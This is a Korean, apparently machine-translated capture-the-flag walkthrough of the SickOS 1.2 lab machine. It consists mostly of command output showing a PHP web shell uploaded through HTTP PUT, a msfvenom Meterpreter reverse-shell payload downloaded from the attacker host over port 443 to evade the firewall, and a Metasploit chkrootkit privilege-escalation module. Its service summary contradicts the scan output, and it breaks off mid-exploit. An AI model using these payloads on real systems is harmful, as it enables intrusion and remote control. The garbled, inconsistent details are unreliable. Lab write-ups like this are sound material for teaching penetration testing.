실험 환경은 다음과 같습니다.
기본 아이디어:
Network Scanning (Netdiscover, Nmap)
Directory brute-force (웹사이트 디렉터리 검색 dirb)
찾기 HTTP 옵션: PUT(HTTP 옵션 컬 찾기)
PHP 백도어 생성(PHP 백도어 Msfvenom 생성)
백도어 업로드 및 실행(PHP 백도어 업로드)
역방향 연결(Metasploit)
권한 에스컬레이션(cron 작업)
적절한 TTY 쉘을 위해 Python 한 줄 가져오기
루트 액세스 권한을 얻고 플래그를 캡처하세요.
1) 네트워크 스캐닝(Netdiscover, Nmap)
root@host06:~# nmap -sV -T4 -A 192.168.32.169 Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-21 19:19 CST Nmap scan report for 192.168.32.169 Host is up (0.00085s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) | http-robots.txt: 5 disallowed entries |_/ange1 /angel1 /nothing /tmp /uploads |_http-server-header: Apache/2.2.22 (Ubuntu) |_http-title: Dina MAC Address: 00:0C:29:29:82:CE (VMware) Device type: general purpose Running: Linux 2.6.X|3.X OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 OS details: Linux 2.6.32 - 3.5 Network Distance: 1 hop TRACEROUTE HOP RTT ADDRESS 1 0.85 ms 192.168.32.169 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.13 seconds
위에서 스캐닝 호스트에 다음 서비스와 포트만 열려 있음을 보여줍니다.
SSH (22/tcp) - OpenSSH 5.9p1 Debian
HTTP (80/tcp) - Lighttpd 1.4.28
2) dirb를 사용하여 웹사이트 디렉토리를 스캔합니다.
root@host06:~# dirb http://192.168.32.169
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Jun 21 19:25:51 2019
URL_BASE: http://192.168.32.169/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.32.169/ ----
+ http://192.168.32.169/index.php (CODE:200|SIZE:163)
==> DIRECTORY: http://192.168.32.169/test/
---- Entering directory: http://192.168.32.169/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Fri Jun 21 19:26:01 2019
DOWNLOADED: 4612 - FOUND: 1
niko를 사용하여 스캔할 때 "X-Content-Type-Options 헤더가 설정되지 않았습니다"라는 메시지가 나타납니다.
root@host06:~# nikto -h http://192.168.32.169 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.32.169 + Target Hostname: 192.168.32.169 + Target Port: 80 + Start Time: 2019-06-21 19:34:28 (GMT8) --------------------------------------------------------------------------- + Server: lighttpd/1.4.28 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + All CGI directories 'found', use '-C none' to test none + Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21 + 26545 requests: 0 error(s) and 4 item(s) reported on remote host + End Time: 2019-06-21 19:37:21 (GMT8) (173 seconds)
curl -v -X를 사용하세요. OPTIONS 다시 http:// 192.168.32.169/test 테스트하여 "put" 및 기타 방법으로 주입이 수행될 수 있는지 확인
root@host06:~# curl -v -X OPTIONS http://192.168.32.169/test * Expire in 0 ms for 6 (transfer 0x5588c3fe4d00) * Trying 192.168.32.169... * TCP_NODELAY set * Expire in 200 ms for 4 (transfer 0x5588c3fe4d00) * Connected to 192.168.32.169 (192.168.32.169) port 80 (#0) > OPTIONS /test HTTP/1.1 > Host: 192.168.32.169 > User-Agent: curl/7.64.0 > Accept: */* > < HTTP/1.1 301 Moved Permanently < DAV: 1,2 < MS-Author-Via: DAV < Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK < Location: http://192.168.32.169/test/ < Content-Length: 0 < Date: Fri, 21 Jun 2019 15:16:48 GMT < Server: lighttpd/1.4.28 < * Connection #0 to host 192.168.32.169 left intact
curl의 put 메소드를 사용하여 파일 업로드 컬 -v -X PUT -d '나는 소년입니다 ' http://192.168.32.169/ test/test.txt
root@host06:~# curl -v -X PUT -d 'I am a boy' http://192.168.32.169/test/test.txt * Expire in 0 ms for 6 (transfer 0x560c4ca07d00) * Trying 192.168.32.169... * TCP_NODELAY set * Expire in 200 ms for 4 (transfer 0x560c4ca07d00) * Connected to 192.168.32.169 (192.168.32.169) port 80 (#0) > PUT /test/test.txt HTTP/1.1 > Host: 192.168.32.169 > User-Agent: curl/7.64.0 > Accept: */* > Content-Length: 10 > Content-Type: application/x-www-form-urlencoded > * upload completely sent off: 10 out of 10 bytes < HTTP/1.1 201 Created < Content-Length: 0 < Date: Fri, 21 Jun 2019 15:22:00 GMT < Server: lighttpd/1.4.28 < * Connection #0 to host 192.168.32.169 left intact
동일한 방법을 사용하여 쉘 명령을 호출하는 PHP 함수를 업로드합니다. 컬 -X PUT -d '
root@host06:~# curl -X PUT -d '<?php system($_GET["cmd"]);' http://192.168.32.169/test/cmd.php root@host06:~# curl "http://192.168.32.169/test/cmd.php?cmd=id;" uid=33(www-data) gid=33(www-data) groups=33(www-data) root@host06:~# curl "http://192.168.32.169/test/cmd.php?cmd=ls%20-lha" total 16K drwxr-xr-x 2 www-data www-data 4.0K Jun 21 08:28 . drwxr-xr-x 3 root root 4.0K Apr 25 2016 .. -rw-r--r-- 1 www-data www-data 27 Jun 21 08:28 cmd.php -rw-r--r-- 1 www-data www-data 10 Jun 21 08:22 test.txt
리바운드 쉘 스크립트를 생성하고 이를 업로드합니다
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.32.10 lport =443 -f raw > put01.php (참고: 여기서 포트 443을 사용하는 목적은 방화벽을 우회하는 것입니다)
root@host06:~# msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.32.10 lport=443 -f raw > put01.php [-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload [-] No arch selected, selecting arch: php from the payload No encoder or badchars specified, outputting raw payload Payload size: 1113 bytes
파일 업로드 방법 1: 원래 업로드된 호출 시스템 cmd 명령 방법
을 사용하여 Python 임시 시작 클라이언트에게 다운로드 콘텐츠를 제공하는 웹 서버입니다. python -m SimpleHTTPServer 443(참고: 방화벽을 우회하기 위해 포트 443을 사용함)
및 실행: 컬 "http://192.168.32.169/test/cmd.php?cmd=wget%20http://192.168.32.10: 443 /put01.php"를 사용하여 put01.php 파일을 다운로드합니다
root@host06:~# python -m SimpleHTTPServer 443 Serving HTTP on 0.0.0.0 port 443 ... 192.168.32.169 - - [21/Jun/2019 20:09:25] "GET /put01.php HTTP/1.1" 200 -
파일 업로드 방법 2: 컬 --upload-file
root@host06:~# curl --upload-file put02.php -v --url http://192.168.32.169/test/put02.php -0 --http1.0 * Expire in 0 ms for 6 (transfer 0x55e395728d00) * Trying 192.168.32.169... * TCP_NODELAY set * Expire in 200 ms for 4 (transfer 0x55e395728d00) * Connected to 192.168.32.169 (192.168.32.169) port 80 (#0) > PUT /test/put02.php HTTP/1.0 > Host: 192.168.32.169 > User-Agent: curl/7.64.0 > Accept: */* > Content-Length: 111 > * We are completely uploaded and fine * HTTP 1.0, assume close after body < HTTP/1.0 201 Created < Content-Length: 0 < Connection: close < Date: Sat, 22 Jun 2019 00:12:16 GMT < Server: lighttpd/1.4.28 < * Closing connection 0
을 사용하여 msfconsole을 시작하고 다음 관련 매개변수를 설정한 후 컬 "http:// 192.168.32.169/ test/put01.php" (즉, 방금 업로드한 쉘을 확인하고 실행)
root@host06:~# msfconsole
_---------.
.' ####### ;."
.---,. ;@ @@`; .---,..
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ `. ;'
|@@@@ @@@ @ .
' @@@ @@ @@ ,
`.@@@@ @@ .
',@@ @ ; _____________
( 3 C ) /|___ / Metasploit! \
;@'. __*__,." \|--- \_____________/
'(.,...."/
=[ metasploit v5.0.28-dev ]
+ -- --=[ 1897 exploits - 1068 auxiliary - 329 post ]
+ -- --=[ 547 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.32.10
lhost => 192.168.32.10
msf5 exploit(multi/handler) > set lport 443
lport => 443
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.32.10:443
[*] Sending stage (38247 bytes) to 192.168.32.169
[*] Meterpreter session 1 opened (192.168.32.10:443 -> 192.168.32.169:49617) at 2019-06-21 20:16:00 +0800
meterpreter > shell
Process 28313 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
chkrootkit -V
chkrootkit version 0.49
^Z
Background channel 0? [y/N] y
meterpreter >
Background session 1? [y/N] y
[-] Unknown command: y.msfconsole 콘솔로 돌아가서 chkroot 취약점을 확인하고 이 취약점을 이용하여 *** 테스트를 수행합니다
msf5 exploit(multi/handler) > search chkroot Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/unix/local/chkrootkit 2014-06-04 manual Yes Chkrootkit Local Privilege Escalation msf5 exploit(multi/handler) > use exploit/unix/local/chkrootkit msf5 exploit(unix/local/chkrootkit) > show options Module options (exploit/unix/local/chkrootkit): Name Current Setting Required Description ---- --------------- -------- ----------- CHKROOTKIT /usr/sbin/chkrootkit yes Path to chkrootkit SESSION yes The session to run this module on. Exploit target: Id Name -- ---- 0 Automatic msf5 exploit(unix/local/chkrootkit) > set session 1 session => 1 msf5 exploit(unix/local/chkrootkit) > set lport 8080 lport => 8080
Re -*** 테스트
위 내용은 SickOS 1.2 플래그를 얻는 방법의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!
![[웹 프런트엔드] Node.js 빠른 시작](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
